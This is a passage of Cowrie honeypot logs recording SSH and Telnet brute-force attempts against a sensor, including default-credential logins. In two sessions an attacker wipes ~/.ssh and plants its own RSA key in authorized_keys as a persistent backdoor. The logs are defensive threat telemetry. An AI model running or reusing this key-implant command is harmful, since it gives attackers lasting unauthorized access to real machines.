fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:54.771038Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:55.334274Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:55.641202Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:55.641925Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:55.643060Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:55.774642Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:56.052379Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.053173Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.185667Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.186708Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59130,"dst_ip":"1.2.3.4","dst_port":22,"session":"12c8907d656e","protocol":"ssh","message":"New connection: 212.227.235.229:59130 (1.2.3.4:22) [session: 12c8907d656e]","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.317726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.318500Z","src_ip":"212.227.235.229","session":"12c8907d656e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:56.449541Z","src_ip":"212.227.235.229","session":"12c8907d656e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:42:57.037877Z","src_ip":"212.227.235.229","session":"12c8907d656e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:58.172302Z","src_ip":"212.227.235.229","session":"12c8907d656e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59886,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ca5690bee83","protocol":"ssh","message":"New connection: 212.227.235.229:59886 (1.2.3.4:22) [session: 6ca5690bee83]","sensor":"my-vps","timestamp":"2025-09-08T12:42:58.302857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:58.304018Z","src_ip":"212.227.235.229","session":"6ca5690bee83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:58.435926Z","src_ip":"212.227.235.229","session":"6ca5690bee83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:59.005240Z","src_ip":"212.227.235.229","session":"6ca5690bee83"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:59.137574Z","src_ip":"212.227.235.229","session":"48967a525c3e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:59.138751Z","src_ip":"212.227.235.229","session":"6ca5690bee83"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":50898,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e9478974546","protocol":"ssh","message":"New connection: 139.59.14.27:50898 (1.2.3.4:22) [session: 7e9478974546]","sensor":"my-vps","timestamp":"2025-09-08T12:43:20.528365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:20.529517Z","src_ip":"139.59.14.27","session":"7e9478974546"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:20.852087Z","src_ip":"139.59.14.27","session":"7e9478974546"}
{"eventid":"cowrie.login.failed","username":"audit","password":"audit2025","message":"login attempt [audit/audit2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:43:22.167005Z","src_ip":"139.59.14.27","session":"7e9478974546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37866,"dst_ip":"1.2.3.4","dst_port":22,"session":"46e23d3035b9","protocol":"ssh","message":"New connection: 212.227.235.229:37866 (1.2.3.4:22) [session: 46e23d3035b9]","sensor":"my-vps","timestamp":"2025-09-08T12:43:22.260055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:22.261093Z","src_ip":"212.227.235.229","session":"46e23d3035b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:22.423866Z","src_ip":"212.227.235.229","session":"46e23d3035b9"}
{"eventid":"cowrie.login.failed","username":"huser","password":"huser2025","message":"login attempt [huser/huser2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:43:23.130038Z","src_ip":"212.227.235.229","session":"46e23d3035b9"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:23.489977Z","src_ip":"139.59.14.27","session":"7e9478974546"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:24.295307Z","src_ip":"212.227.235.229","session":"46e23d3035b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41782,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe851c0dc23","protocol":"ssh","message":"New connection: 212.227.235.229:41782 (1.2.3.4:22) [session: 7fe851c0dc23]","sensor":"my-vps","timestamp":"2025-09-08T12:43:25.442063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:25.443321Z","src_ip":"212.227.235.229","session":"7fe851c0dc23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:25.714135Z","src_ip":"212.227.235.229","session":"7fe851c0dc23"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-09-08T12:43:26.837324Z","src_ip":"212.227.235.229","session":"7fe851c0dc23"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:28.140458Z","src_ip":"212.227.235.229","session":"7fe851c0dc23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58786,"dst_ip":"1.2.3.4","dst_port":23,"session":"538f3b2da0de","protocol":"telnet","message":"New connection: 212.227.235.229:58786 (1.2.3.4:23) [session: 538f3b2da0de]","sensor":"my-vps","timestamp":"2025-09-08T12:43:30.454207Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59558,"dst_ip":"1.2.3.4","dst_port":22,"session":"e71d31b65e6d","protocol":"ssh","message":"New connection: 212.227.235.229:59558 (1.2.3.4:22) [session: e71d31b65e6d]","sensor":"my-vps","timestamp":"2025-09-08T12:43:36.805918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:36.808496Z","src_ip":"212.227.235.229","session":"e71d31b65e6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:37.098315Z","src_ip":"212.227.235.229","session":"e71d31b65e6d"}
{"eventid":"cowrie.login.failed","username":"manish","password":"manish","message":"login attempt [manish/manish] failed","sensor":"my-vps","timestamp":"2025-09-08T12:43:38.264164Z","src_ip":"212.227.235.229","session":"e71d31b65e6d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:39.557273Z","src_ip":"212.227.235.229","session":"e71d31b65e6d"}
{"eventid":"cowrie.session.closed","duration":13.138147115707397,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:43.592277Z","src_ip":"212.227.235.229","session":"538f3b2da0de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56150,"dst_ip":"1.2.3.4","dst_port":22,"session":"80e435939a06","protocol":"ssh","message":"New connection: 212.227.235.229:56150 (1.2.3.4:22) [session: 80e435939a06]","sensor":"my-vps","timestamp":"2025-09-08T12:43:56.663458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:56.664551Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:56.796196Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:43:57.365806Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:43:57.646993Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:43:57.647643Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:43:57.648399Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:57.781264Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:43:58.146838Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.147517Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.281774Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.282627Z","src_ip":"212.227.235.229","session":"80e435939a06"}
